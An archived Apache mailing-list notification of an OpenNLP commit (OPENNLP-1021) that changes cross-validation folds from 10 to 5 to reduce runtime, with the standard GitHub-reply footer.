commit 79ca96b767644b7e65a62fe042bb844b9c14c5aa
Author: Jörn Kottmann <jo...@apache.org>
Date:   2017-04-24T14:08:13Z

OPENNLP-1021: Change xv folds from 10 to 5 to reduce runtime




---
If your project is set up for it, you can reply to this email and have your
reply appear on GitHub as well. If your project does not have this feature
enabled and wishes so, or if the feature is enabled but not working, please
contact infrastructure at infrastruct...@apache.org or file a JIRA ticket
with INFRA.
---


  1   2   3   4   >